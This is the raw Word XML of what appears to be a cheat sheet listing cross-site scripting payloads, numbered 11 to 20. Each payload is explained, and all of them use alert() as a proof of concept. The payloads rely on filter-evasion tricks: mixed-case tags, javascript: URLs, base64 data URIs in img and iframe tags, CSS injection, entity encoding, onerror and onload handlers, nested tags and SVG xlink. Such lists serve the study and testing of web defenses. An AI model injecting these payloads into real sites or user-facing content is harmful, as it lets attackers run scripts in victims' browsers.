    </w:p>
    <w:p w14:paraId="20CA835D" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Demonstrates HTML entity encoding by double encoding characters to evade filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E5982" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="7754387A" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="422FD4A2" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="6F07D9DD" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="6B5C9815" w14:textId="5E5B21BB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11.Mixed Case Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D05B9C" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34576503" w14:textId="586B0725" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CAE8CD" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>sCRipT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>scRIpT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E51C99A" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Changes the case of the &lt;script&gt; tag to evade basic pattern-matching filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFFD94" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="349FC812" w14:textId="7CBA3787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12.JavaScript URL Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE235BA" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034014D" w14:textId="54CCADC4" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622D3EC" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>('XSS')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5128BC68" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">Exploits the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">: pseudo-protocol within an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D0BA0D" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7E3726" w14:textId="7087B437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13.Base64 Encoding Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699F8972" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2868C9C2" w14:textId="04BA79F8" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710EE2B" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> src="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>data:image</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>/svg+xml;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMlswXSkiPjwvc3ZnPg=="&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DC788" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Uses a Base64-encoded SVG image payload to execute JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C7310" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="6D4711AA" w14:textId="7CE8F20B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14.CSS Injection Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E89DF00" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3CC28A" w14:textId="0BDA5C11" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800032B" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;style&gt;body{background-image:url('</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>("XSS")')}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33867D10" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Injects JavaScript into a CSS style block, attempting to execute within a background-image property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49788CC7" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="30BD9073" w14:textId="014B67C8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15.HTML Entity Encoding Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B7370" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16583AC6" w14:textId="5E0004F7" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3826A" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>lt;script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&amp;gt;alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>('XSS')&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>script&amp;gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3EF719" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Represents the basic XSS payload after HTML entity encoding to evade HTML tag detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9A44B7" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="57DD7F13" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="0AF174CF" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="5D6B4C33" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="654AD0A8" w14:textId="6D478D07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16.Attribute Injection Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1A60D" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640BFE77" w14:textId="33385ADB" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2DFF7C" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">="" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF133B" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">Attempts XSS through an empty </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> attribute and an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> event handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D81C0CF" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="05CEA124" w14:textId="065DE553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17.Nested Tag Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA362AA" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490CEC79" w14:textId="362B2D3E" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8BA32" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;&lt;script&gt;script&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>/script&gt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086BDAA6" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Attempts to bypass filters by nesting the &lt;script&gt; tag within another opening tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFB48C" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="6BAE3912" w14:textId="10276475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18.Data URI Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756849F1" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE99FFB" w14:textId="33922D81" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB3CB8" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> src="data:text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>html;base</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69454532" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Utilizes a data URI to embed Base64-encoded JavaScript within an &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C6DA7" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D875504" w14:textId="174F3BC2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19.MIME Type Bypass Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F27D32" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B99864" w14:textId="393D6F78" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63181B21" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">&gt;&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>xlink:href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>data:,alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>('XSS')"&gt;&lt;/script&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5A2EC" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">Tries to bypass filters by using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>xlink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> attribute within an SVG tag to execute JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D7FAB8" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="7CBA4D84" w14:textId="29F45A7B" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045140A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20.JavaScript Event Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5DDDA1" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C352B" w14:textId="234C7C75" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196077A2" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;body onload="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DA407E" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Uses the onload event handler in the &lt;body&gt; tag to trigger an alert when the page loads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E8F5EB" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="786A9804" w14:textId="16F689CE" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidSect="00032F60">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="360" w:right="296" w:bottom="18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6F"/>
    <w:rsid w:val="00032F60"/>
    <w:rsid w:val="0028276F"/>
    <w:rsid w:val="002A336C"/>
    <w:rsid w:val="0045140A"/>
    <w:rsid w:val="0054090B"/>
    <w:rsid w:val="005A6E5C"/>
    <w:rsid w:val="00AC02B2"/>
    <w:rsid w:val="00BD5889"/>
    <w:rsid w:val="00E504A8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35246"/>
  <w15:docId w15:val="{8195C740-7C0D-4C10-B9D7-E01C5084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atex-mathml">
    <w:name w:val="katex-mathml"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0028276F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mord">
    <w:name w:val="mord"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0028276F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist-s">
    <w:name w:val="vlist-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0028276F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mrel">
    <w:name w:val="mrel"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0028276F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mbin">
    <w:name w:val="mbin"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0028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22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996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254071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114880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80668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4856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1576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0167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6326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698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58198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3633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08039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2520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0105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16640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13930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4385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435019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987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8286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678955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44544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77538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29988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6287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24585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3238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25353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16715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52255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9364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43338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073842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6278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655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449144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1150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572897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32222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98662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1650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629670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335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62619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563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6304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0770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1402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27901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4985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234950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7699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3129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0811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8866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45200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5806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46237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5596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8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76864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6761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01421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6141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1105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2878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9929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9155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148160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4432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22312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74519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51160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7557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747615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58312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20922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96941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54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560082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80537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713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7988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76090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7152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99045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83042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57902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7836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914323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94309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9123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32291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0461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234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895568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8506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867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34650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1976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37157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75117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07055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778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43773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0933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8695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87414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4965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222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96287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498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1441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09371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950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82166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3296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02967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68598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6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9160C9-59C9-47BB-A7DC-EC18D3151ED5}">
  <we:reference id="wa104381909" version="3.12.1.0" store="en-US" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="WA104381909" version="3.12.1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FFDB-35FD-4697-873E-5FF73CA6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jayanth</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sai jayanth</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-30T19:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-30T19:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>